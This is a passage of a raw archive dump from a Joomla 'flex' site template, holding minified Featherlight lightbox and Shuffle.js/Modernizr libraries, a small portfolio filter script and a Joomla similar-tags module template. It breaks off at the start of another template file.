10px 0;border-bottom:10px solid transparent}}PK!k��664flex/html/com_spsimpleportfolio/assets/js/index.htmlnu&1i�<html><head><title></title></head><body></body></html>PK!wl���=flex/html/com_spsimpleportfolio/assets/js/featherlight.min.jsnu&1i�/**
 * Featherlight - ultra slim jQuery lightbox
 * Version 1.2.0 - http://noelboss.github.io/featherlight/
 *
 * Copyright 2015, Noël Raoul Bossart (http://www.noelboss.com)
 * MIT Licensed.
**/
!function(a){"use strict";function b(a,c){if(!(this instanceof b)){var d=new b(a,c);return d.open(),d}this.id=b.id++,this.setup(a,c),this.chainCallbacks(b._callbackChain)}if("undefined"==typeof a)return void("console"in window&&window.console.info("Too much lightness, Featherlight needs jQuery."));var c=[],d=function(b){return c=a.grep(c,function(a){return a!==b&&a.$instance.closest("body").length>0})},e=function(a,b){var c={},d=new RegExp("^"+b+"([A-Z])(.*)");for(var e in a){var f=e.match(d);if(f){var g=(f[1]+f[2].replace(/([A-Z])/g,"-$1")).toLowerCase();c[g]=a[e]}}return c},f={keyup:"onKeyUp",resize:"onResize"},g=function(c){a.each(b.opened().reverse(),function(){return c.isDefaultPrevented()||!1!==this[f[c.type]](c)?void 0:(c.preventDefault(),c.stopPropagation(),!1)})},h=function(c){if(c!==b._globalHandlerInstalled){b._globalHandlerInstalled=c;var d=a.map(f,function(a,c){return c+"."+b.prototype.namespace}).join(" ");a(window)[c?"on":"off"](d,g)}};b.prototype={constructor:b,namespace:"featherlight",targetAttr:"data-featherlight",variant:null,resetCss:!1,background:null,openTrigger:"click",closeTrigger:"click",filter:null,root:"body",openSpeed:250,closeSpeed:250,closeOnClick:"background",closeOnEsc:!0,closeIcon:"&#10005;",loading:"",otherClose:null,beforeOpen:a.noop,beforeContent:a.noop,beforeClose:a.noop,afterOpen:a.noop,afterContent:a.noop,afterClose:a.noop,onKeyUp:a.noop,onResize:a.noop,type:null,contentFilters:["jquery","image","html","ajax","iframe","text"],setup:function(b,c){"object"!=typeof b||b instanceof a!=!1||c||(c=b,b=void 0);var d=a.extend(this,c,{target:b}),e=d.resetCss?d.namespace+"-reset":d.namespace,f=a(d.background||['<div class="'+e+"-loading "+e+'">','<div class="'+e+'-content">','<span class="'+e+"-close-icon "+d.namespace+'-close">',d.closeIcon,"</span>",'<div class="'+d.namespace+'-inner">'+d.loading+"</div>","</div>","</div>"].join("")),g="."+d.namespace+"-close"+(d.otherClose?","+d.otherClose:"");return d.$instance=f.clone().addClass(d.variant),d.$instance.on(d.closeTrigger+"."+d.namespace,function(b){var c=a(b.target);("background"===d.closeOnClick&&c.is("."+d.namespace)||"anywhere"===d.closeOnClick||c.closest(g).length)&&(b.preventDefault(),d.close())}),this},getContent:function(){var b=this,c=this.constructor.contentFilters,d=function(a){return b.$currentTarget&&b.$currentTarget.attr(a)},e=d(b.targetAttr),f=b.target||e||"",g=c[b.type];if(!g&&f in c&&(g=c[f],f=b.target&&e),f=f||d("href")||"",!g)for(var h in c)b[h]&&(g=c[h],f=b[h]);if(!g){var i=f;if(f=null,a.each(b.contentFilters,function(){return g=c[this],g.test&&(f=g.test(i)),!f&&g.regex&&i.match&&i.match(g.regex)&&(f=i),!f}),!f)return"console"in window&&window.console.error("Featherlight: no content filter found "+(i?' for "'+i+'"':" (no target specified)")),!1}return g.process.call(b,f)},setContent:function(b){var c=this;return(b.is("iframe")||a("iframe",b).length>0)&&c.$instance.addClass(c.namespace+"-iframe"),c.$instance.removeClass(c.namespace+"-loading"),c.$instance.find("."+c.namespace+"-inner").slice(1).remove().end().replaceWith(a.contains(c.$instance[0],b[0])?"":b),c.$content=b.addClass(c.namespace+"-inner"),c},open:function(b){var d=this;if(!(b&&b.isDefaultPrevented()||d.beforeOpen(b)===!1)){b&&b.preventDefault();var e=d.getContent();if(e)return c.push(d),h(!0),d.$instance.appendTo(d.root).fadeIn(d.openSpeed),d.beforeContent(b),a.when(e).always(function(c){d.setContent(c),d.afterContent(b),a.when(d.$instance.promise()).done(function(){d.afterOpen(b)})}),d}return!1},close:function(a){var b=this;return b.beforeClose(a)===!1?!1:(0===d(b).length&&h(!1),void b.$instance.fadeOut(b.closeSpeed,function(){b.$instance.detach(),b.afterClose(a)}))},chainCallbacks:function(b){for(var c in b)this[c]=a.proxy(b[c],this,a.proxy(this[c],this))}},a.extend(b,{id:0,autoBind:"[data-featherlight]",defaults:b.prototype,contentFilters:{jquery:{regex:/^[#.]\w/,test:function(b){return b instanceof a&&b},process:function(b){return a(b).clone(!0)}},image:{regex:/\.(png|jpg|jpeg|gif|tiff|bmp)(\?\S*)?$/i,process:function(b){var c=this,d=a.Deferred(),e=new Image,f=a('<img src="'+b+'" alt="" class="'+c.namespace+'-image" />');return e.onload=function(){f.naturalWidth=e.width,f.naturalHeight=e.height,d.resolve(f)},e.onerror=function(){d.reject(f)},e.src=b,d.promise()}},html:{regex:/^\s*<[\w!][^<]*>/,process:function(b){return a(b)}},ajax:{regex:/./,process:function(b){var c=a.Deferred(),d=a("<div></div>").load(b,function(a,b){"error"!==b&&c.resolve(d.contents()),c.fail()});return c.promise()}},iframe:{process:function(b){var c=new a.Deferred,d=a("<iframe/>").hide().attr("src",b).css(e(this,"iframe")).on("load",function(){c.resolve(d.show())}).appendTo(this.$instance.find("."+this.namespace+"-content"));return c.promise()}},text:{process:function(b){return a("<div>",{text:b})}}},functionAttributes:["beforeOpen","afterOpen","beforeContent","afterContent","beforeClose","afterClose"],readElementConfig:function(b){var c=this,d={};return b&&b.attributes&&a.each(b.attributes,function(){var b=this.name.match(/^data-featherlight-(.*)/);if(b){var e=this.value,f=a.camelCase(b[1]);if(a.inArray(f,c.functionAttributes)>=0)e=new Function(e);else try{e=a.parseJSON(e)}catch(g){}d[f]=e}}),d},extend:function(b,c){var d=function(){this.constructor=b};return d.prototype=this.prototype,b.prototype=new d,b.__super__=this.prototype,a.extend(b,this,c),b.defaults=b.prototype,b},attach:function(b,c,d){var e=this;"object"!=typeof c||c instanceof a!=!1||d||(d=c,c=void 0),d=a.extend({},d);var f=a.extend({},e.defaults,e.readElementConfig(b[0]),d);return b.on(f.openTrigger+"."+f.namespace,f.filter,function(f){var g=a.extend({$source:b,$currentTarget:a(this)},e.readElementConfig(b[0]),e.readElementConfig(this),d);new e(c,g).open(f)}),b},current:function(){var a=this.opened();return a[a.length-1]||null},opened:function(){var b=this;return d(),a.grep(c,function(a){return a instanceof b})},close:function(){var a=this.current();a&&a.close()},_onReady:function(){var b=this;b.autoBind&&(b.attach(a(document),{filter:b.autoBind}),a(b.autoBind).filter("[data-featherlight-filter]").each(function(){b.attach(a(this))}))},_callbackChain:{onKeyUp:function(a,b){return 27===b.keyCode?(this.closeOnEsc&&this.$instance.find("."+this.namespace+"-close:first").click(),!1):a(b)},onResize:function(a,b){if(this.$content.naturalWidth){var c=this.$content.naturalWidth,d=this.$content.naturalHeight;this.$content.css("width","").css("height","");var e=Math.max(c/parseInt(this.$content.parent().css("width"),10),d/parseInt(this.$content.parent().css("height"),10));e>1&&this.$content.css("width",""+c/e+"px").css("height",""+d/e+"px")}return a(b)},afterContent:function(a,b){var c=a(b);return this.onResize(b),c}}}),a.featherlight=b,a.fn.featherlight=function(a,c){return b.attach(this,a,c)},a(document).ready(function(){b._onReady()})}(jQuery);PK!A*"�iCiCIflex/html/com_spsimpleportfolio/assets/js/jquery.shuffle.modernizr.min.jsnu&1i�/*!
 * Shuffle.js by @Vestride
 * Categorize, sort, and filter a responsive grid of items.
 * Dependencies: jQuery 1.9+, Modernizr 2.6.2+
 * @license MIT license
 * @version 3.1.1
 */
window.Modernizr=function(a,b,c){function d(a){s.cssText=a}function e(a,b){return typeof a===b}function f(a,b){return!!~(""+a).indexOf(b)}function g(a,b){for(var d in a){var e=a[d];if(!f(e,"-")&&s[e]!==c)return"pfx"==b?e:!0}return!1}function h(a,b,d){for(var f in a){var g=b[a[f]];if(g!==c)return d===!1?a[f]:e(g,"function")?g.bind(d||b):g}return!1}function i(a,b,c){var d=a.charAt(0).toUpperCase()+a.slice(1),f=(a+" "+v.join(d+" ")+d).split(" ");return e(b,"string")||e(b,"undefined")?g(f,b):(f=(a+" "+w.join(d+" ")+d).split(" "),h(f,b,c))}var j,k,l,m="2.6.2",n={},o=!0,p=b.documentElement,q="modernizr",r=b.createElement(q),s=r.style,t=({}.toString," -webkit- -moz- -o- -ms- ".split(" ")),u="Webkit Moz O ms",v=u.split(" "),w=u.toLowerCase().split(" "),x={},y=[],z=y.slice,A=function(a,c,d,e){var f,g,h,i,j=b.createElement("div"),k=b.body,l=k||b.createElement("body");if(parseInt(d,10))for(;d--;)h=b.createElement("div"),h.id=e?e[d]:q+(d+1),j.appendChild(h);return f=["&#173;",'<style id="s',q,'">',a,"</style>"].join(""),j.id=q,(k?j:l).innerHTML+=f,l.appendChild(j),k||(l.style.background="",l.style.overflow="hidden",i=p.style.overflow,p.style.overflow="hidden",p.appendChild(l)),g=c(j,a),k?j.parentNode.removeChild(j):(l.parentNode.removeChild(l),p.style.overflow=i),!!g},B={}.hasOwnProperty;l=e(B,"undefined")||e(B.call,"undefined")?function(a,b){return b in a&&e(a.constructor.prototype[b],"undefined")}:function(a,b){return B.call(a,b)},Function.prototype.bind||(Function.prototype.bind=function(a){var b=this;if("function"!=typeof b)throw new TypeError;var c=z.call(arguments,1),d=function(){if(this instanceof d){var e=function(){};e.prototype=b.prototype;var f=new e,g=b.apply(f,c.concat(z.call(arguments)));return Object(g)===g?g:f}return b.apply(a,c.concat(z.call(arguments)))};return d}),x.csstransforms=function(){return!!i("transform")},x.csstransforms3d=function(){var a=!!i("perspective");return a&&"webkitPerspective"in p.style&&A("@media (transform-3d),(-webkit-transform-3d){#modernizr{left:9px;position:absolute;height:3px;}}",function(b){a=9===b.offsetLeft&&3===b.offsetHeight}),a},x.csstransitions=function(){return i("transition")};for(var C in x)l(x,C)&&(k=C.toLowerCase(),n[k]=x[C](),y.push((n[k]?"":"no-")+k));return n.addTest=function(a,b){if("object"==typeof a)for(var d in a)l(a,d)&&n.addTest(d,a[d]);else{if(a=a.toLowerCase(),n[a]!==c)return n;b="function"==typeof b?b():b,"undefined"!=typeof o&&o&&(p.className+=" "+(b?"":"no-")+a),n[a]=b}return n},d(""),r=j=null,n._version=m,n._prefixes=t,n._domPrefixes=w,n._cssomPrefixes=v,n.testProp=function(a){return g([a])},n.testAllProps=i,n.testStyles=A,n.prefixed=function(a,b,c){return b?i(a,b,c):i(a,"pfx")},p.className=p.className.replace(/(^|\s)no-js(\s|$)/,"$1$2")+(o?" js "+y.join(" "):""),n}(this,this.document),function(a){"function"==typeof define&&define.amd?define(["jquery","modernizr"],a):"object"==typeof exports?module.exports=a(require("jquery"),window.Modernizr):window.Shuffle=a(window.jQuery,window.Modernizr)}(function(a,b,c){"use strict";function d(a){return a?a.replace(/([A-Z])/g,function(a,b){return"-"+b.toLowerCase()}).replace(/^ms-/,"-ms-"):""}function e(b,c,d){var e,f,g,h=null,i=0;d=d||{};var j=function(){i=d.leading===!1?0:a.now(),h=null,g=b.apply(e,f),e=f=null};return function(){var k=a.now();i||d.leading!==!1||(i=k);var l=c-(k-i);return e=this,f=arguments,0>=l||l>c?(clearTimeout(h),h=null,i=k,g=b.apply(e,f),e=f=null):h||d.trailing===!1||(h=setTimeout(j,l)),g}}function f(a,b,c){for(var d=0,e=a.length;e>d;d++)if(b.call(c,a[d],d,a)==={})return}function g(b,c,d){return setTimeout(a.proxy(b,c),d)}function h(a){return Math.max.apply(Math,a)}function i(a){return Math.min.apply(Math,a)}function j(b){return a.isNumeric(b)?b:0}function k(a){var b,c,d=a.length;if(!d)return a;for(;--d;)c=Math.floor(Math.random()*(d+1)),b=a[c],a[c]=a[d],a[d]=b;return a}if("object"!=typeof b)throw new Error("Shuffle.js requires Modernizr.\nhttp://vestride.github.io/Shuffle/#dependencies");var l=b.prefixed("transition"),m=b.prefixed("transitionDelay"),n=b.prefixed("transitionDuration"),o={WebkitTransition:"webkitTransitionEnd",transition:"transitionend"}[l],p=b.prefixed("transform"),q=d(p),r=b.csstransforms&&b.csstransitions,s=b.csstransforms3d,t=!!window.getComputedStyle,u="shuffle",v="all",w="groups",x=1,y=.001,z=window.getComputedStyle||function(){},A=function(a,b){this.x=j(a),this.y=j(b)};A.equals=function(a,b){return a.x===b.x&&a.y===b.y};var B=function(){if(!t)return!1;var a=document.body||document.documentElement,b=document.createElement("div");b.style.cssText="width:10px;padding:2px;-webkit-box-sizing:border-box;box-sizing:border-box;",a.appendChild(b);var c=z(b,null).width,d="10px"===c;return a.removeChild(b),d}(),C=0,D=a(window),E=function(b,c){c=c||{},a.extend(this,E.options,c,E.settings),this.$el=a(b),this.element=b,this.unique="shuffle_"+C++,this._fire(E.EventType.LOADING),this._init(),g(function(){this.initialized=!0,this._fire(E.EventType.DONE)},this,16)};return E.EventType={LOADING:"loading",DONE:"done",LAYOUT:"layout",REMOVED:"removed"},E.ClassName={BASE:u,SHUFFLE_ITEM:"shuffle-item",FILTERED:"filtered",CONCEALED:"concealed"},E.options={group:v,speed:250,easing:"ease-out",itemSelector:"",sizer:null,gutterWidth:0,columnWidth:0,delimeter:null,buffer:0,columnThreshold:t?.01:.1,initialSort:null,throttle:e,throttleTime:300,sequentialFadeDelay:150,supported:r},E.settings={useSizer:!1,itemCss:{position:"absolute",top:0,left:0,visibility:"visible"},revealAppendedDelay:300,lastSort:{},lastFilter:v,enabled:!0,destroyed:!1,initialized:!1,_animations:[],_transitions:[],_isMovementCanceled:!1,styleQueue:[]},E.Point=A,E._getItemTransformString=function(a,b){return s?"translate3d("+a.x+"px, "+a.y+"px, 0) scale3d("+b+", "+b+", 1)":"translate("+a.x+"px, "+a.y+"px) scale("+b+")"},E._getNumberStyle=function(b,c,d){if(t){d=d||z(b,null);var e=E._getFloat(d[c]);return B||"width"!==c?B||"height"!==c||(e+=E._getFloat(d.paddingTop)+E._getFloat(d.paddingBottom)+E._getFloat(d.borderTopWidth)+E._getFloat(d.borderBottomWidth)):e+=E._getFloat(d.paddingLeft)+E._getFloat(d.paddingRight)+E._getFloat(d.borderLeftWidth)+E._getFloat(d.borderRightWidth),e}return E._getFloat(a(b).css(c))},E._getFloat=function(a){return j(parseFloat(a))},E._getOuterWidth=function(a,b){var c=z(a,null),d=E._getNumberStyle(a,"width",c);if(b){var e=E._getNumberStyle(a,"marginLeft",c),f=E._getNumberStyle(a,"marginRight",c);d+=e+f}return d},E._getOuterHeight=function(a,b){var c=z(a,null),d=E._getNumberStyle(a,"height",c);if(b){var e=E._getNumberStyle(a,"marginTop",c),f=E._getNumberStyle(a,"marginBottom",c);d+=e+f}return d},E._skipTransition=function(a,b,c){var d=a.style[n];a.style[n]="0ms",b.call(c);var e=a.offsetWidth;e=null,a.style[n]=d},E.prototype._init=function(){this.$items=this._getItems(),this.sizer=this._getElementOption(this.sizer),this.sizer&&(this.useSizer=!0),this.$el.addClass(E.ClassName.BASE),this._initItems(),D.on("resize."+u+"."+this.unique,this._getResizeFunction());var a=this.$el.css(["position","overflow"]),b=E._getOuterWidth(this.element);this._validateStyles(a),this._setColumns(b),this.shuffle(this.group,this.initialSort),this.supported&&g(function(){this._setTransitions(),this.element.style[l]="height "+this.speed+"ms "+this.easing},this)},E.prototype._getResizeFunction=function(){var b=a.proxy(this._onResize,this);return this.throttle?this.throttle(b,this.throttleTime):b},E.prototype._getElementOption=function(a){return"string"==typeof a?this.$el.find(a)[0]||null:a&&a.nodeType&&1===a.nodeType?a:a&&a.jquery?a[0]:null},E.prototype._validateStyles=function(a){"static"===a.position&&(this.element.style.position="relative"),"hidden"!==a.overflow&&(this.element.style.overflow="hidden")},E.prototype._filter=function(a,b){a=a||this.lastFilter,b=b||this.$items;var c=this._getFilteredSets(a,b);return this._toggleFilterClasses(c.filtered,c.concealed),this.lastFilter=a,"string"==typeof a&&(this.group=a),c.filtered},E.prototype._getFilteredSets=function(b,c){var d=a(),e=a();return b===v?d=c:f(c,function(c){var f=a(c);this._doesPassFilter(b,f)?d=d.add(f):e=e.add(f)},this),{filtered:d,concealed:e}},E.prototype._doesPassFilter=function(b,c){if(a.isFunction(b))return b.call(c[0],c,this);var d=c.data(w),e=this.delimeter&&!a.isArray(d)?d.split(this.delimeter):d;return a.inArray(b,e)>-1},E.prototype._toggleFilterClasses=function(a,b){a.removeClass(E.ClassName.CONCEALED).addClass(E.ClassName.FILTERED),b.removeClass(E.ClassName.FILTERED).addClass(E.ClassName.CONCEALED)},E.prototype._initItems=function(a){a=a||this.$items,a.addClass([E.ClassName.SHUFFLE_ITEM,E.ClassName.FILTERED].join(" ")),a.css(this.itemCss).data("point",new A).data("scale",x)},E.prototype._updateItemCount=function(){this.visibleItems=this._getFilteredItems().length},E.prototype._setTransition=function(a){a.style[l]=q+" "+this.speed+"ms "+this.easing+", opacity "+this.speed+"ms "+this.easing},E.prototype._setTransitions=function(a){a=a||this.$items,f(a,function(a){this._setTransition(a)},this)},E.prototype._setSequentialDelay=function(a){this.supported&&f(a,function(a,b){a.style[m]="0ms,"+(b+1)*this.sequentialFadeDelay+"ms"},this)},E.prototype._getItems=function(){return this.$el.children(this.itemSelector)},E.prototype._getFilteredItems=function(){return this.$items.filter("."+E.ClassName.FILTERED)},E.prototype._getConcealedItems=function(){return this.$items.filter("."+E.ClassName.CONCEALED)},E.prototype._getColumnSize=function(b,c){var d;return d=a.isFunction(this.columnWidth)?this.columnWidth(b):this.useSizer?E._getOuterWidth(this.sizer):this.columnWidth?this.columnWidth:this.$items.length>0?E._getOuterWidth(this.$items[0],!0):b,0===d&&(d=b),d+c},E.prototype._getGutterSize=function(b){var c;return c=a.isFunction(this.gutterWidth)?this.gutterWidth(b):this.useSizer?E._getNumberStyle(this.sizer,"marginLeft"):this.gutterWidth},E.prototype._setColumns=function(a){var b=a||E._getOuterWidth(this.element),c=this._getGutterSize(b),d=this._getColumnSize(b,c),e=(b+c)/d;Math.abs(Math.round(e)-e)<this.columnThreshold&&(e=Math.round(e)),this.cols=Math.max(Math.floor(e),1),this.containerWidth=b,this.colWidth=d},E.prototype._setContainerSize=function(){this.$el.css("height",this._getContainerSize())},E.prototype._getContainerSize=function(){return h(this.positions)},E.prototype._fire=function(a,b){this.$el.trigger(a+"."+u,b&&b.length?b:[this])},E.prototype._resetCols=function(){var a=this.cols;for(this.positions=[];a--;)this.positions.push(0)},E.prototype._layout=function(a,b){f(a,function(a){this._layoutItem(a,!!b)},this),this._processStyleQueue(),this._setContainerSize()},E.prototype._layoutItem=function(b,c){var d=a(b),e=d.data(),f=e.point,g=e.scale,h={width:E._getOuterWidth(b,!0),height:E._getOuterHeight(b,!0)},i=this._getItemPosition(h);A.equals(f,i)&&g===x||(e.point=i,e.scale=x,this.styleQueue.push({$item:d,point:i,scale:x,opacity:c?0:1,skipTransition:c||0===this.speed,callfront:function(){c||d.css("visibility","visible")},callback:function(){c&&d.css("visibility","hidden")}}))},E.prototype._getItemPosition=function(a){for(var b=this._getColumnSpan(a.width,this.colWidth,this.cols),c=this._getColumnSet(b,this.cols),d=this._getShortColumn(c,this.buffer),e=new A(Math.round(this.colWidth*d),Math.round(c[d])),f=c[d]+a.height,g=this.cols+1-c.length,h=0;g>h;h++)this.positions[d+h]=f;return e},E.prototype._getColumnSpan=function(a,b,c){var d=a/b;return Math.abs(Math.round(d)-d)<this.columnThreshold&&(d=Math.round(d)),Math.min(Math.ceil(d),c)},E.prototype._getColumnSet=function(a,b){if(1===a)return this.positions;for(var c=b+1-a,d=[],e=0;c>e;e++)d[e]=h(this.positions.slice(e,e+a));return d},E.prototype._getShortColumn=function(a,b){for(var c=i(a),d=0,e=a.length;e>d;d++)if(a[d]>=c-b&&a[d]<=c+b)return d;return 0},E.prototype._shrink=function(b){var c=b||this._getConcealedItems();f(c,function(b){var c=a(b),d=c.data();d.scale!==y&&(d.scale=y,this.styleQueue.push({$item:c,point:d.point,scale:y,opacity:0,callback:function(){c.css("visibility","hidden")}}))},this)},E.prototype._onResize=function(){if(this.enabled&&!this.destroyed){var a=E._getOuterWidth(this.element);a!==this.containerWidth&&this.update()}},E.prototype._getStylesForTransition=function(a){var b={opacity:a.opacity};return this.supported?b[p]=E._getItemTransformString(a.point,a.scale):(b.left=a.point.x,b.top=a.point.y),b},E.prototype._transition=function(b){var c=this._getStylesForTransition(b);this._startItemAnimation(b.$item,c,b.callfront||a.noop,b.callback||a.noop)},E.prototype._startItemAnimation=function(b,c,d,e){function f(b){b.target===b.currentTarget&&(a(b.target).off(o,f),g._removeTransitionReference(h),e())}var g=this,h={$element:b,handler:f};if(d(),!this.initialized)return b.css(c),void e();if(this.supported)b.css(c),b.on(o,f),this._transitions.push(h);else{var i=b.stop(!0).animate(c,this.speed,"swing",e);this._animations.push(i.promise())}},E.prototype._processStyleQueue=function(b){this.isTransitioning&&this._cancelMovement();var c=a();f(this.styleQueue,function(a){a.skipTransition?this._styleImmediately(a):(c=c.add(a.$item),this._transition(a))},this),c.length>0&&this.initialized&&this.speed>0?(this.isTransitioning=!0,this.supported?this._whenCollectionDone(c,o,this._movementFinished):this._whenAnimationsDone(this._movementFinished)):b||g(this._layoutEnd,this),this.styleQueue.length=0},E.prototype._cancelMovement=function(){this.supported?f(this._transitions,function(a){a.$element.off(o,a.handler)}):(this._isMovementCanceled=!0,this.$items.stop(!0),this._isMovementCanceled=!1),this._transitions.length=0,this.isTransitioning=!1},E.prototype._removeTransitionReference=function(b){var c=a.inArray(b,this._transitions);c>-1&&this._transitions.splice(c,1)},E.prototype._styleImmediately=function(a){E._skipTransition(a.$item[0],function(){a.$item.css(this._getStylesForTransition(a))},this)},E.prototype._movementFinished=function(){this.isTransitioning=!1,this._layoutEnd()},E.prototype._layoutEnd=function(){this._fire(E.EventType.LAYOUT)},E.prototype._addItems=function(a,b,c){this._initItems(a),this._setTransitions(a),this.$items=this._getItems(),this._shrink(a),f(this.styleQueue,function(a){a.skipTransition=!0}),this._processStyleQueue(!0),b?this._addItemsToEnd(a,c):this.shuffle(this.lastFilter)},E.prototype._addItemsToEnd=function(a,b){var c=this._filter(null,a),d=c.get();this._updateItemCount(),this._layout(d,!0),b&&this.supported&&this._setSequentialDelay(d),this._revealAppended(d)},E.prototype._revealAppended=function(b){g(function(){f(b,function(b){var c=a(b);this._transition({$item:c,opacity:1,point:c.data("point"),scale:x})},this),this._whenCollectionDone(a(b),o,function(){a(b).css(m,"0ms"),this._movementFinished()})},this,this.revealAppendedDelay)},E.prototype._whenCollectionDone=function(b,c,d){function e(b){b.target===b.currentTarget&&(a(b.target).off(c,e),f++,f===g&&(h._removeTransitionReference(i),d.call(h)))}var f=0,g=b.length,h=this,i={$element:b,handler:e};b.on(c,e),this._transitions.push(i)},E.prototype._whenAnimationsDone=function(b){a.when.apply(null,this._animations).always(a.proxy(function(){this._animations.length=0,this._isMovementCanceled||b.call(this)},this))},E.prototype.shuffle=function(a,b){this.enabled&&(a||(a=v),this._filter(a),this._updateItemCount(),this._shrink(),this.sort(b))},E.prototype.sort=function(a){if(this.enabled){this._resetCols();var b=a||this.lastSort,c=this._getFilteredItems().sorted(b);this._layout(c),this.lastSort=b}},E.prototype.update=function(a){this.enabled&&(a||this._setColumns(),this.sort())},E.prototype.layout=function(){this.update(!0)},E.prototype.appended=function(a,b,c){this._addItems(a,b===!0,c!==!1)},E.prototype.disable=function(){this.enabled=!1},E.prototype.enable=function(a){this.enabled=!0,a!==!1&&this.update()},E.prototype.remove=function(b){function c(){b.remove(),this.$items=this._getItems(),this._updateItemCount(),this._fire(E.EventType.REMOVED,[b,this]),b=null}b.length&&b.jquery&&(this._toggleFilterClasses(a(),b),this._shrink(b),this.sort(),this.$el.one(E.EventType.LAYOUT+"."+u,a.proxy(c,this)))},E.prototype.destroy=function(){D.off("."+this.unique),this.$el.removeClass(u).removeAttr("style").removeData(u),this.$items.removeAttr("style").removeData("point").removeData("scale").removeClass([E.ClassName.CONCEALED,E.ClassName.FILTERED,E.ClassName.SHUFFLE_ITEM].join(" ")),this.$items=null,this.$el=null,this.sizer=null,this.element=null,this._transitions=null,this.destroyed=!0},a.fn.shuffle=function(b){var c=Array.prototype.slice.call(arguments,1);return this.each(function(){var d=a(this),e=d.data(u);e?"string"==typeof b&&e[b]&&e[b].apply(e,c):(e=new E(this,b),d.data(u,e))})},a.fn.sorted=function(b){var d=a.extend({},a.fn.sorted.defaults,b),e=this.get(),f=!1;return e.length?d.randomize?k(e):(a.isFunction(d.by)&&e.sort(function(b,e){if(f)return 0;var g=d.by(a(b)),h=d.by(a(e));return g===c&&h===c?(f=!0,0):h>g||"sortFirst"===g||"sortLast"===h?-1:g>h||"sortLast"===g||"sortFirst"===h?1:0}),f?this.get():(d.reverse&&e.reverse(),e)):[]},a.fn.sorted.defaults={reverse:!1,by:null,randomize:!1},E});PK!�L���>flex/html/com_spsimpleportfolio/assets/js/spsimpleportfolio.jsnu&1i�/**
 * @package     SP Simple Portfolio
 *
 * @copyright   Copyright (C) 2010 - 2014 JoomShaper. All rights reserved.
 * @license     GNU General Public License version 2 or later.
 */

jQuery(function($) {

	var $container 	= $('.sp-simpleportfolio-items');
	
	$(window).load(function() {
		var $sizer = $container.find('.shuffle__sizer');

		$container.shuffle({
			itemSelector: '.sp-simpleportfolio-item',
			speed: 600,
            easing: 'cubic-bezier(0.635, 0.010, 0.355, 1.000)',
			sequentialFadeDelay: 150,
			sizer: $sizer
		});
	});


	// Filters
	$('.sp-simpleportfolio-filter li a').on('click', function(event){
		event.preventDefault();
		var $self = $(this);
		var $this = $(this).parent();
		
		if($this.hasClass('active')) {
			return;
		}

		$self.closest('ul').children().removeClass('active');
		$self.parent().addClass('active');

		$container.shuffle( 'shuffle', $this.data('group') );
	});

});

PK!�ךܖ�Eflex/html/com_spsimpleportfolio/assets/js/featherlight.gallery.min.jsnu&1i�/**
 * Featherlight Gallery – an extension for the ultra slim jQuery lightbox
 * Version 1.3.4 - http://noelboss.github.io/featherlight/
 *
 * Copyright 2015, Noël Raoul Bossart (http://www.noelboss.com)
 * MIT Licensed.
**/!function(a){"use strict";function b(c,d){if(!(this instanceof b)){var e=new b(a.extend({$source:c,$currentTarget:c.first()},d));return e.open(),e}a.featherlight.apply(this,arguments),this.chainCallbacks(h)}var c=function(a){window.console&&window.console.warn&&window.console.warn("FeatherlightGallery: "+a)};if("undefined"==typeof a)return c("Too much lightness, Featherlight needs jQuery.");if(!a.featherlight)return c("Load the featherlight plugin before the gallery plugin");var d="ontouchstart"in window||window.DocumentTouch&&document instanceof DocumentTouch,e=a.event&&a.event.special.swipeleft&&a,f=window.Hammer&&function(a){var b=new window.Hammer.Manager(a[0]);return b.add(new window.Hammer.Swipe),b},g=d&&(e||f);d&&!g&&c("No compatible swipe library detected; one must be included before featherlightGallery for swipe motions to navigate the galleries.");var h={afterClose:function(a,b){var c=this;return c.$instance.off("next."+c.namespace+" previous."+c.namespace),c._swiper&&(c._swiper.off("swipeleft",c._swipeleft).off("swiperight",c._swiperight),c._swiper=null),a(b)},beforeOpen:function(a,b){var c=this;return c.$instance.on("next."+c.namespace+" previous."+c.namespace,function(a){var b="next"===a.type?1:-1;c.navigateTo(c.currentNavigation()+b)}),g?c._swiper=g(c.$instance).on("swipeleft",c._swipeleft=function(){c.$instance.trigger("next")}).on("swiperight",c._swiperight=function(){c.$instance.trigger("previous")}):c.$instance.find("."+c.namespace+"-content").append(c.createNavigation("previous")).append(c.createNavigation("next")),a(b)},onKeyUp:function(a,b){var c={37:"previous",39:"next"}[b.keyCode];return c?(this.$instance.trigger(c),!1):a(b)}};a.featherlight.extend(b,{autoBind:"[data-featherlight-gallery]"}),a.extend(b.prototype,{previousIcon:"&#9664;",nextIcon:"&#9654;",galleryFadeIn:100,galleryFadeOut:300,slides:function(){return this.filter?this.$source.find(this.filter):this.$source},images:function(){return c("images is deprecated, please use slides instead"),this.slides()},currentNavigation:function(){return this.slides().index(this.$currentTarget)},navigateTo:function(b){var c=this,d=c.slides(),e=d.length,f=c.$instance.find("."+c.namespace+"-inner");return b=(b%e+e)%e,c.$currentTarget=d.eq(b),c.beforeContent(),a.when(c.getContent(),f.fadeTo(c.galleryFadeOut,.2)).always(function(a){c.setContent(a),c.afterContent(),a.fadeTo(c.galleryFadeIn,1)})},createNavigation:function(b){var c=this;return a('<span title="'+b+'" class="'+this.namespace+"-"+b+'"><span>'+this[b+"Icon"]+"</span></span>").click(function(){a(this).trigger(b+"."+c.namespace)})}}),a.featherlightGallery=b,a.fn.featherlightGallery=function(a){return b.attach(this,a)},a(document).ready(function(){b._onReady()})}(jQuery);PK!������&flex/html/mod_tags_similar/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_tags_popular
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

?>
<?php JLoader::register('TagsHelperRoute', JPATH_BASE . '/components/com_tags/helpers/route.php'); ?>
<div class="tagssimilar<?php echo $moduleclass_sfx; ?>">
<?php if ($list) : ?>
	<ul>
	<?php foreach ($list as $i => $item) : ?>
		<li>
			<?php $item->route = new JHelperRoute; ?>
			<a href="<?php echo JRoute::_(TagsHelperRoute::getItemRoute($item->content_item_id, $item->core_alias, $item->core_catid, $item->core_language, $item->type_alias, $item->router)); ?>">
				<?php if (!empty($item->core_title)) :
					echo htmlspecialchars($item->core_title);
				endif; ?>
			</a>
		</li>
	<?php endforeach; ?>
	</ul>
<?php else : ?>
	<span><?php echo JText::_('MOD_TAGS_SIMILAR_NO_MATCHING_TAGS'); ?></span>
<?php endif; ?>
</div>
PK!2�TJ�
�
'flex/html/mod_related_items/default.phpnu&1i�<?php
/**
